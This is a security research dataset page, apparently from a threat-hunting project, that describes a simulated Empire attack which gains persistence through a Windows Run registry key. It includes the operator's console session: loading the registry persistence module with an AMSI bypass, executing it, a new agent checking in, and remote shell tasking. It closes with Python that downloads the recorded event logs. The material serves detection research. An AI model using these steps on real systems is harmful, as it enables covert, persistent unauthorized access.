Empire Userland Registry Run Keys#



Roberto Rodriguez @Cyb3rWard0g

Creation Date


Modification Date







Local Registry Modification,Registry Run Keys

Dataset Description#

This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run) for persistence. It also captures the execution of the persistence mechanism.

Simulation Metadata#








Adversary View#

(Empire: stager/multi/launcher) > 
(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:02:57  http            

(Empire: agents) > interact KU86XWEL
(Empire: KU86XWEL) > 
(Empire: KU86XWEL) > usemodule persistence/
elevated/registry*                 misc/add_netuser                   misc/install_ssp*                  powerbreach/resolver
elevated/rid_hijack*               misc/add_sid_history*              misc/memssp*                       userland/backdoor_lnk
elevated/schtasks*                 misc/debugger*                     misc/skeleton_key*                 userland/registry
elevated/wmi*                      misc/disable_machine_acct_change*  powerbreach/deaduser               userland/schtasks
elevated/wmi_updater*              misc/get_ssps                      powerbreach/eventlog*              
(Empire: KU86XWEL) > usemodule persistence/userland/registry
(Empire: powershell/persistence/userland/registry) > info

              Name: Invoke-Registry
            Module: powershell/persistence/userland/registry
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None


  Persist a stager (or script) via the
  HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry
  key. This has an easy detection/removal rating.



  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        KU86XWEL                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  KeyName          True        Updater                   Key name for the run trigger.           
  RegPath          False       HKCU:Software\Microsoft\  Registry location to store the script   
                              Windows\CurrentVersion\D  code. Last element is the key name.     
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  EventLogID       False                                 Store the script in the Application     
                                                        event log under the specified EventID.  
                                                        The ID needs to be unique/rare!         
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/userland/registry) > set Listener http
(Empire: powershell/persistence/userland/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked KU86XWEL to run TASK_CMD_WAIT
[*] Agent KU86XWEL tasked with task ID 1
[*] Tasked agent KU86XWEL to run module powershell/persistence/userland/registry
(Empire: powershell/persistence/userland/registry) > 
Registry persistence established using listener http stored in HKCU:Software\Microsoft\Windows\CurrentVersion\Debug.

(Empire: powershell/persistence/userland/registry) > 
(Empire: powershell/persistence/userland/registry) > 
[*] Sending POWERSHELL stager (stage 1) to
[*] New agent SP7B3U2X checked in
[+] Initial agent SP7B3U2X from now active (Slack)
[*] Sending agent (stage 2) to SP7B3U2X at

(Empire: powershell/persistence/userland/registry) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            
SP7B3U2X ps     WORKSTATION5      THESHIRE\pgustavo       powershell         1376   5/0.0    2020-09-04 07:09:04  http            

(Empire: agents) > interact SP7B3U2X
(Empire: SP7B3U2X) > shell whoami
[*] Tasked SP7B3U2X to run TASK_SHELL
[*] Agent SP7B3U2X tasked with task ID 1
(Empire: SP7B3U2X) > 
..Command execution completed.

    (Empire: SP7B3U2X) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_standard_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#